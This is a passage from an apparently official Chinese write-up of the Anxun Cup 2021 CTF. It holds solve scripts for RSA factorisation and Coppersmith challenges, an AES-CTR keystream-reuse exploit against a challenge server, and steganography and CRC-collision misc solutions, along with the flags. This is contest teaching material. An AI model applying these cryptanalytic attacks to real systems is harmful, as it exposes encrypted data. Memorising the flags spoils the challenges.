,[11, 13, 59, 17] ,[45, 55, 92, 46] ,[39, 18, 90, 62] ,[92, 17, 97, 23] ,[7, 59, 98, 34] ,[64, 70, 95, 19] ,[85, 51, 11, 12] ,[63, 2, 27, 22] ,[44, 29, 90, 48] ,[37, 95, 20, 29] ,[14, 48, 50, 96] ,[19, 80, 37, 84] ,[45, 43, 4, 76] ,[42, 56, 55, 58] ,[13, 84, 76, 25] ,[62, 74, 79, 94] ,[90, 68, 76, 90] ,[81, 9, 92, 73] ,[88, 39, 58, 85] ,[19, 61, 10, 90] ,[50, 45, 55, 38] ,[91, 13, 55, 48] ,[47, 63, 40, 92] ,[14, 18, 83, 54] ,[68, 9, 61, 84] ,[8, 17, 68, 16] ,[63, 42, 72, 6] ,[20, 38, 19, 39] ,[13, 84, 76, 25] ,[20, 9, 65, 58] ,[49, 55, 80, 32] ,[11, 13, 59, 17] ,[25, 68, 68, 84] ,[30, 57, 26, 80] ,[68, 9, 61, 84] ,[20, 9, 65, 58] ,[14, 18, 83, 54] ,[96, 1, 73, 15] ,[81, 9, 92, 73] ,[8, 17, 68, 16] ,[40, 20, 17, 24] ,[58, 20, 64, 94] ,[92, 17, 97, 23] ,[27, 50, 56, 46] ,[90, 29, 45, 13] ,[96, 55, 47, 52] ,[14, 48, 50, 96] ,[62, 74, 79, 94] ,[67, 78, 52, 51] ,[91, 13, 55, 48] ,[37, 95, 20, 29] ,[39, 18, 90, 62] ,[23, 10, 39, 15] ,[23, 54, 36, 60] ,[9, 95, 14, 73] ,[23, 54, 36, 60] ,[23, 54, 36, 60] ,[95, 14, 2, 99] ,[19, 61, 10, 90] ,[7, 76, 97, 41] ,[35, 83, 35, 5] ,[11, 13, 59, 17] ,[7, 21, 30, 90] ,[63, 2, 27, 22] ,[54, 13, 71, 30] ,[37, 90, 39, 20] ,[68, 9, 16, 60] ,[23, 54, 36, 60] ,[49, 85, 8, 37] ,[54, 13, 71, 30] ,[74, 20, 20, 60] ,[90, 68, 76, 90] ,[27, 48, 8, 33] ,[36, 48, 41, 44] ,[27, 48, 8, 33] ,[35, 43, 45, 34] ,[42, 56, 55, 58] ,[84, 75, 42, 25] ,[91, 13, 55, 48] ,[23, 10, 39, 15] ,[27, 50, 56, 46] ,[22, 96, 12, 70] ,[1, 11, 39, 68] ,[63, 42, 72, 6] ,[23, 54, 36, 60] ,[57, 42, 57, 20] ,[73, 91, 3, 0] ,[30, 57, 26, 80] ,[22, 93, 94, 2] ,[68, 9, 16, 60] ,[47, 63, 40, 92] ,[8, 17, 68, 16] ,[35, 83, 35, 5] ,[27, 50, 56, 46] ,[50, 45, 55, 38] ,[35, 83, 35, 5] ,[46, 37, 13, 86] ,[90, 29, 45, 13] ,[40, 54, 86, 17] ,[40, 54, 86, 17] ,[71, 83, 18, 99] ,[76, 51, 99, 53] ,[49, 85, 8, 37] ,[6, 41, 11, 75] ,[1, 11, 39, 68] ,[67, 78, 52, 51] ,[8, 60, 99, 14] ,[18, 66, 33, 19] ,[90, 68, 76, 90] ,[81, 9, 92, 73] ,[79, 3, 83, 31] ,[76, 51, 99, 53] ,[49, 85, 8, 37] ,[92, 94, 89, 8] ,[63, 2, 27, 22] ,[24, 50, 16, 82] ,[76, 51, 99, 53] ,[27, 54, 70, 95] ,[54, 13, 71, 30] ,[88, 39, 58, 85] ,[39, 18, 90, 62] ,[32, 15, 65, 7] ,[35, 43, 45, 34] ,[47, 63, 40, 92] ,[9, 95, 14, 73] ,[23, 10, 39, 15] ,[92, 17, 97, 23] ,[68, 9, 61, 84] ,[32, 62, 0, 98] ,[45, 43, 4, 76] ,[35, 83, 35, 5] ,[7, 76, 97, 41] ,[35, 83, 35, 5] ,[58, 20, 64, 94] ,[7, 43, 24, 44] ,[90, 29, 45, 13] ,[71, 83, 18, 99] ,[58, 20, 64, 94] ,[96, 55, 47, 52] ,[40, 54, 86, 17] ,[45, 55, 92, 46] ,[81, 9, 92, 73] ,[13, 84, 76, 25] ,[81, 9, 92, 73] ,[8, 60, 99, 14] ,[19, 80, 37, 84] ,[49, 85, 8, 37] ,[7, 59, 98, 34] ,[35, 83, 35, 5] ,[47, 65, 66, 14] ,[38, 23, 16, 91] ,[57, 63, 81, 27] ,[10, 70, 65, 94] ,[45, 87, 3, 28] ,[64, 70, 95, 19] ,[62, 74, 79, 94] ,[18, 66, 33, 19] ,[54, 75, 74, 86] ,[37, 92, 84, 21] ,[1, 11, 39, 68] ,[68, 9, 16, 60] ,[19, 80, 37, 84] ,[73, 91, 3, 0] ,[35, 43, 45, 34] ,[37, 92, 84, 21] ,[20, 9, 65, 58] ,[81, 9, 92, 73] ,[96, 1, 73, 15] ,[7, 59, 98, 34] ,[32, 62, 0, 98]]

result = [-38, -121, -40, -125, -51, -29, -2, -21, -59, -54, -51, -40, -105, -5, -4, -50, -127, -56, -124, -128, -23, -104, -63, -112, -34, -115, -58, -99, -24, -102, -1, -5, -34, -3, -104, -103, -21, -62, -121, -24, -115, -9, -87, -56, -39, -30, -34, -4, -33, -5, -114, -21, -19, -7, -119, -107, -115, -6, -25, -27, -32, -62, -28, -20, -60, -121, -102, -10, -112, -7, -85, -110, -62, -100, -110, -29, -41, -55, -113, -112, -45, -106, -125, -25, -57, -27, -83, -2, -51, -118, -2, -10, -50, -40, -1, -82, -111, -113, -50, -48, -23, -33, -112, -38, -29, -26, -4, -40, -123, -4, -44, -120, -63, -38, -41, -22, -50, -50, -17, -122, -61, -5, -100, -22, -44, -47, -125, -125, -127, -55, -117, -100, -2, -26, -32, -111, -123, -118, -16, -24, -20, -40, -92, -40, -102, -49, -99, -45, -59, -98, -49, -13, -62, -128, -121, -114, -112, -13, -3, -4, -26, -35, -15, -35, -8, -18, -125, -14, -6, -60, -113, -104, -120, -64, -104, -55, -104, -41, -34, -106, -105, -2, -28, -14, -58, -128, -3, -1, -17, -38, -18, -12, -59, -4, -19, -82, -40, -122, -18, -42, -53, -60, -113, -40, -126, -15, -63, -40, -124, -114, -58, -26, -35, -26, -8, -48, -112, -52, -11, -117, -52, -32, -21, -38, -124, -13, -103, -6, -30, -33, -28, -31, -1, -97, -59, -64, -28, -1, -40, -2, -10, -26, -24, -3, -50, -113, -125, -122, -124, -5, -50, -62, -11, -8, -88, -109, -7, -31, -105, -54, -28, -8, -62, -58, -101, -58, -53, -124, -18, -124, -17, -109, -52, -45, -40, -109, -85, -7, -108, -121, -58, -49, -91, -102, -8, -10, -17, -55, -19, -11, -116, -47, -120, -121, -23, -99, -19, -51, -36, -110, -126, -29, -110, -9, -97, -54, -83, -86]

C = [1, 0, 7789, 1, 17598, 20447, 15475, 23040, 41318, 23644, 53369, 19347, 66418, 5457, 0, 1, 14865, 97631, 6459, 36284, 79023, 1, 157348, 44667, 185701, 116445, 23809, 220877, 0, 1, 222082, 30333, 55446, 207442, 193806, 149389, 173229, 349031, 152205, 1, 149157, 196626, 1, 222532, 10255, 46268, 171536, 0, 351788, 152678, 0, 172225, 109296, 0, 579280, 634746, 1, 668942, 157973, 1, 17884, 662728, 759841, 450490, 0, 139520, 157015, 616114, 199878, 154091, 1, 937462, 675736, 53200, 495985, 307528, 1, 804492, 790322, 463560, 520991, 436782, 762888, 267227, 306436, 1051437, 384380, 505106, 729384, 1261978, 668266, 1258657, 913103, 935600, 1, 1, 401793, 769612, 484861, 1024896, 517254, 638872, 1139995, 700201, 308216, 333502, 0, 0, 401082, 1514640, 667345, 1015119, 636720, 1011683, 795560, 783924, 1269039, 5333, 0, 368271, 1700344, 1, 383167, 7540, 1490472, 1484752, 918665, 312560, 688665, 967404, 922857, 624126, 889856, 1, 848912, 1426397, 1291770, 1669069, 0, 1709762, 130116, 1711413, 1336912, 2080992, 820169, 903313, 515984, 2211283, 684372, 2773063, 391284, 1934269, 107761, 885543, 0, 2551314, 2229565, 1392777, 616280, 1368347, 154512, 1, 1668051, 0, 2453671, 2240909, 2661062, 2880183, 1376799, 0, 2252003, 1, 17666, 1, 2563626, 251045, 1593956, 2215158, 0, 93160, 0, 2463412, 654734, 1, 3341062, 3704395, 3841103, 609968, 2297131, 1942751, 3671207, 1, 1209611, 3163864, 3054774, 1055188, 1, 4284662, 3647599, 247779, 0, 176021, 3478840, 783050, 4613736, 2422927, 280158, 2473573, 2218037, 936624, 2118304, 353989, 3466709, 4737392, 2637048, 4570953, 1473551, 0, 0, 4780148, 3299784, 592717, 538363, 2068893, 814922, 2183138, 2011758, 2296545, 5075424, 1814196, 974225, 669506, 2756080, 5729359, 4599677, 5737886, 3947814, 4852062, 1571349, 4123825, 2319244, 4260764, 1266852, 1, 3739921, 1, 5948390, 1, 2761119, 2203699, 1664472, 3182598, 6269365, 5344900, 454610, 495499, 6407607, 1, 1, 476694, 4339987, 5642199, 1131185, 4092110, 2802555, 0, 5323448, 1103156, 2954018, 1, 1860057, 128891, 2586833, 6636077, 3136169, 1, 3280730, 6970001, 1874791, 48335, 6229468, 6384918, 5412112, 1, 7231540, 7886316, 2501899, 8047283, 2971582, 354078, 401999, 6427168, 4839680, 1, 44050, 3319427, 0, 1, 1452967, 4620879, 5525420, 5295860, 643415, 5594621, 951449, 1996797, 2561796, 6707895, 7072739]

dp = ''

for i in range(0,len(result)):

dp = dp + chr((~result[i]|rands[i][i%4]) & (result[i]|~rands[i][i%4]))

dq = ''

E = 0x10001

list_p = sieve_base[0:len(C)]

list_q = sieve_base[len(C):2*len(C)]

for l in range(0,len(C)):

P = list_p[l]

Q = list_q[l]

D = gmpy2.invert(E,(P-1)*(Q-1))

dq = dq + str(pow(C[l],D,P*Q))

decode(p,q,int(dp),int(dq),c,n)

=====

D0g3{Welc0me_t0_iSOON_4nd_have_4_go0d_time}

>>>

ez_equation

n的因子是5个素数，前三个素数利用公因数解出，最后利用费马分解得到后两个素数。

分析得到n与M1有最大公因数p2，利用p2再解方程得到p1，p3

from Crypto.Util.number import *

import gmpy2

M1= 3826382835023788442651551584905620963555468828948525089808250303867245240492543151274589993810948153358311949129889992078565218014437985797623260774173862776314394305207460929010448541919151371739763413408901958357439883687812941802749556269540959238015960789123081724913563415951118911225765239358145144847672813272304000303248185912184454183649550881987218183213383170287341491817813853157303415010621029153827654424674781799037821018845093480149146846916972070471616774326658992874624717335369963316741346596692937873980736392272357429717437248731018333011776098084532729315221881922688633390593220647682367272566275381196597702434911557385351389179790132595840157110385379375472525985874178185477024824406364732573663044243615168471526446290952781887679180315888377262181547383953231277148364854782145192348432075591465309521454441382119502677245090726728912738123512316475762664749771002090738886940569852252159994522316

M2= 4046011043117694641224946060698160981194371746049558443191995592417947642909277226440465640195903524402898673255622570650810338780358645872293473212692240675287998097280715739093285167811740252792986119669348108850168574423371861266994630851360381835920384979279568937740516573412510564312439718402689547377548575653450519989914218115265842158616123026997554651983837361028152010675551489190669776458201696937427188572741833635865019931327548900804323792893273443467251902886636756173665823644958563664967475910962085867559357008073496875191391847757991101189003154422578662820049387899402383235828011830444034463049749668906583814229827321704450021715601349950406035896249429068630164092309047645766216852109121662629835574752784717997655595307873219503797996696389945782836994848995124776375146245061787647756704605043856735398002012276311781956668212776588970619658063515356931386886871554860891089498456646036630114620806

c= 1394946766416873131554934453357121730676319808212515786127918041980606746238793432614766163520054818740952818682474896886923871330780883504028665380422608364542618561981233050210507202948882989763960702612116316321009210541932155301216511791505114282546592978453573529725958321827768703566503841883490535620591951871638499011781864202874525798224508022092610499899166738864346749753379399602574550324310119667774229645827773608873832795828636770263111832990012205276425559363977526114225540962861740929659841165039419904164961095126757294762709194552018890937638480126740196955840656602020193044969685334441405413154601311657668298101837066325231888411018908300828382192203062405287670490877283269761047853117971492197659115995537837080400730294215778540754482680476723953659085854297184575548489544772248049479632420289954409052781880871933713121875562554234841599323223793407272634167421053493995795570508435905280269774274084603687516219837730100396191746101622725880529896250904142333391598426588238082485305372659584052445556638990497626342509620305749829144158797491411816819447836265318302080212452925144191536031249404138978886262136129250971366841779218675482632242265233134997115987510292911606736878578493796260507458773824689843424248233282828057027197528977864826149756573867022173521177021297886987799897923182290515542397534652789013340264587028424629766689059507844211910072808286250914059983957934670979551428204569782238857331272372035625901349763799005621577332502957693517473861726359829588419409120076625939502382579605

n= 19445950132976386911852381666731799463510958712950274248183192405937223343228119407660772413067599252710235310402278345391806863116119010697766434743302798644091220730819441599784039955347398797545219314925103529062092963912855489464914723588833817280786158985269401131919618320866942737291915603551320163001129725430205164159721810319128999027215168063922977994735609079166656264150778896809813972275824980250733628895449444386265971986881443278517689428198251426557591256226431727934365277683559038777220498839443423272238231659356498088824520980466482528835994554892785108805290209163646408594682458644235664198690503128767557430026565606308422630014285982847395405342842694189025641950775231191537369161140012412147734635114986068452144499789367187760595537610501700993916441274609074477086105160306134590864545056872161818418667370690945602050639825453927168529154141097668382830717867158189131567590506561475774252148991615602388725559184925467487450078068863876285937273896246520621965096127440332607637290032226601266371916124456122172418136550577512664185685633131801385265781677598863031205194151992390159339130895897510277714768645984660240750580001372772665297920679701044966607241859495087319998825474727920273063120701389749480852403561022063673222963354420556267045325208933815212625081478538158049144348626000996650436898760300563194390820694376019146835381357141426987786643471325943646758131021529659151319632425988111406974492951170237774415667909612730440407365124264956213064305556185423432341935847320496716090528514947

p2 = gmpy2.gcd(n,M1)

p2_2 = pow(p2, 2)

delta = pow(p2_2 + p2, 2) - (4 * p2 * (p2_2-M1))

p1 = (-(p2_2 + p2) + list(gmpy2.iroot(delta,2))[0]) // (2 * p2)

p3 = (M2 + 2) // (p2_2 + p1*p2) - 1

N1 = p1*p2*p3

N2 = n // N1

N3 = list(gmpy2.iroot(N2,2))[0] + 1

while True:

mul = pow(N3,2) - N2

if(list(gmpy2.iroot(mul,2))[1]):

M = list(gmpy2.iroot(mul,2))[0]

p = N3 - M

q = N3 + M

break

N3 += 1

phi = (p1 - 1) * (p2 - 1) * (p3 - 1) * (p - 1) * (q - 1)

e = 65537

d = gmpy2.invert(e,phi)

print(long_to_bytes(gmpy2.powmod(c,d,n)))

D0g3{296b680c-7aeb-5272-8b33-7335b411fbcb}

strange

已知m&hint和hint，利用Coppersmith求m|hint

m|hint = 13420866878657192881981508918368509601760484822510871697454710042290632315733970543259862148639047993224391010676733

恢复m

from Crypto.Util.number import *

N = 13002904520196087913175026378157676218772224961198751789793139372975952998874109513709715017379230449514880674554473551508221946249854541352973100832075633211148140972925579736088058214014993082226530875284219933922497736077346225464349174819075866774069797318066487496627589111652333814065053663974480486379799102403118744672956634588445292675676671957278976483815342400168310432107890845293789670795394151784569722676109573685451673961309951157399183944789163591809561790491021872748674809148737825709985578568373545210653290368264452963080533949168735319775945818152681754882108865201849467932032981615400210529003

c = 8560367979088389639093355670052955344968008917787780010833158290316540154791612927595480968370338549837249823871244436946889198677945456273317343886485741297260557172704718731809632734567349815338988169177983222118718585249696953103962537942023413748690596354436063345873831550109098151014332237310265412976776977183110431262893144552042116871747127301026195142320678244525719655551498368460837394436842924713450715998795899172774573341189660227254331656916960984157772527015479797004423165812493802730996272276613362505737536007284308929288293814697988968407777480072409184261544708820877153825470988634588666018802

m1 = 13420866878657192881981508918368509601760484822510871697454710042290632315733970543259862148639047993224391010676733

m2 = 9869907877594701353175281930839281485694004896356038595955883788511764488228640164047958227861871572990960024485992

hint = 9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144

res = ''

while m2 > 0:

a = hint & 1

b = m2 & 1

c = m1 & 1

if a == 0:

assert b == 0

res += str(c)

else:

res += str(b)

m1 >>= 1

m2 >>= 1

hint >>= 1

mes = '0' + res[::-1]

print(long_to_bytes(int(mes,2)).decode())

=====

D0g3{R54_f4l1_1n_l0ve_with_CopperSmith_w0wow0!!}

>>>

air encryption

连上之后给了6次交互机会, 但其中最少有一次需要用来set key

有三个选项:

• set key : 初始化aes-ctr的counter

• guess num: 每猜中一次随机数, 分数+1

• get flag : 当分数不为4的时候, 发送的为有填充的加密的flag, 分数为4的时候发送明文flag

思路

由于题目set key没有校验次数, 可以多次重置密钥, 且密钥为每一次连接生成的随机值, 加上aes-ctr的特性, 只需要获取到足够长的明文即可

在guess key中, 猜对随机数服务端会发送填充加密后的right, 猜错随机数会发送填充加密后wrong, 实际上, 这里的明文都不够长,

于是这样会出现只能获取到一半flag的情况。

正确是思路的是故意输入不符合要求的命令, 由于self.send(b'something wrong, check your input'), 填充和加密操作被内置到了send方法里面, 所以这里会发送很长的密文, 重复三次, 去除重合的部分即可得到足够长的密钥流

于是6次机会 = 1次set key初始化 + 3次报错guess num获取密钥流 + 1次set key重置密钥流 + 1次get flag获取加密后的flag

本地解密即可

exp

#!/usr/bin/pythonfrom pwn import *from pwnlib.util.iters import mbruteforcefrom hashlib import sha256import stringimport timeimport binasciicontext.log_level = 'debug'r = remote('happi0.club', 10086)

def padding( msg):

return  msg + chr((16 - len(msg)%16)).encode() * (16 - len(msg)%16)

def xor_bytes(var, key):

return bytes(a ^ b for a, b in zip(var, key))

def decrypt(ct):

msg = padding(b'something wrong, check your input')

pt = xor_bytes(msg, ct)

return pt

# powdata = r.recvline()print(data[12:28], data[33:97])found = mbruteforce(lambda x:sha256(x.encode() + data[12:28]).hexdigest().encode() == data[33:97], string.ascii_letters+string.digits, 4)r.sendline(found)r.recvline()

# set keyn = int(binascii.unhexlify(r.recvline()[:-1]))d = int(binascii.unhexlify(r.recvline()[:-1])) // 2c = int(binascii.unhexlify(r.recvline()[:-1]))m = pow(c,d,n)r.sendline(b'set key:' + str(m).encode())time.sleep(0.5)

# guess numkey_stream = b''for i in range(3):

r.sendline(b'happi0')

time.sleep(0.5)

ct = binascii.unhexlify(r.recvline()[:-1])

pt = decrypt(ct)

if i != 2:

key_stream += pt[:16]

else:

key_stream += pt

print('pt:' + str(pt) + 'n' + 'length: ' + str(len(pt)))

print('key_stream:' + str(key_stream) + 'n' + 'length: ' + str(len(key_stream)) + 'n')

# reset keyr.sendline(b'set key:' + str(m).encode())time.sleep(0.5)r.sendline(b'get flag')time.sleep(0.5)

# decrypt flagflag = binascii.unhexlify(r.recvline()[:-1])print(flag, type(flag), key_stream)flag = xor_bytes(flag, key_stream)print(flag)

#b'x8axa8x83xedxe9xe0xe5x11xf4x9cxccxb6Kx91xbbxa9xf0xd4tx15x19rxf5Zx9d.x9368x90xe8xd5flag{c836b2abae33d2e5b9a0e50b28ba5e95}nnnnnnnnnn'

MISC

签到

虽然说了不要搅屎（因为算是用了公共环境），但还是被搞了，挺无奈的。

给了BV号，一看那么多播放量和弹幕量就不是纯看弹幕一个一个找。所以去https://www.fybgame.top/bilibili/bilibili.html查询关键字D0g3即可。

CyzCC_loves_LOL

一个加密压缩包和一个password文件，password打开，又因为LOL的提示可以看出是LOLcode 解出压缩包密码为：

AGdJfpqebmXpptloa

解出一个jinx's_flag_in_silent.jpg和program.png

jpg类的隐写一般只有stegdetect能检测出的几种和silenteye,既然有silent这个提示，尝试但发现解不出来。这是因为silenteye也有密码这个问题。所以我们关注一下program.png，另一种与lol有关的图形化code，是brainloller code。

https://minond.xyz/brainloller/

在这里进行解密，再替换silenteye的默认密码即可。

Cthulhu Mythos

flag一共分为两段，第一段是sstv解码，得到一张图片

第二段flag藏在.wld文件中，利用(地图编辑器/直接打开游戏地图)，观察由电路和箱子中雕像组成的字符得到另一段flag。其中游玩地图的需要注意的是电路需要手持与电路有关的物品才能看见。

两段拼接起来再base32解码可得到flag：

D0g3{M1necR4ft_G0_And_Try_Terr4ria!}

lovemath

打开压缩包看到多个字节很小的txt文件，而且文件加密。考虑使用crc碰撞得到文件内的内容

使用脚本

https://link.csdn.net/?target=https%3A%2F%2Fgithub.com%2Ftheonlypwner%2Fcrc32

python3 crc32.py reverse 0x你的crc32密文

依次解密得到字符

th1s_Is_Y0ur_pa33w0rd_We1c0m3e

将其当做密码解压文件

解压后得到一张png图片，使用Stegsolve.jar查看发现存在LSB,提取BGR的0通道

save bin出来，删掉开头的fffe即可得到⼀张数字图，使⽤QQ的识图⼯具能得到上⾯的数字

1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352

根据题目的描述，数学你是如此美丽，甚至能画出自己。搜索能画出自己的数学公式可知道是说的塔珀自指公式

上面得到数字为k值

使⽤在线⽹站https://viegg.com/tupper/demo.html解密得到flag

原文始发于微信公众号（白帽子程序员）：【CTF学习】--安洵杯2021 官方Writeup(Web|Misc|Crypto) - D0g3——获取flag思路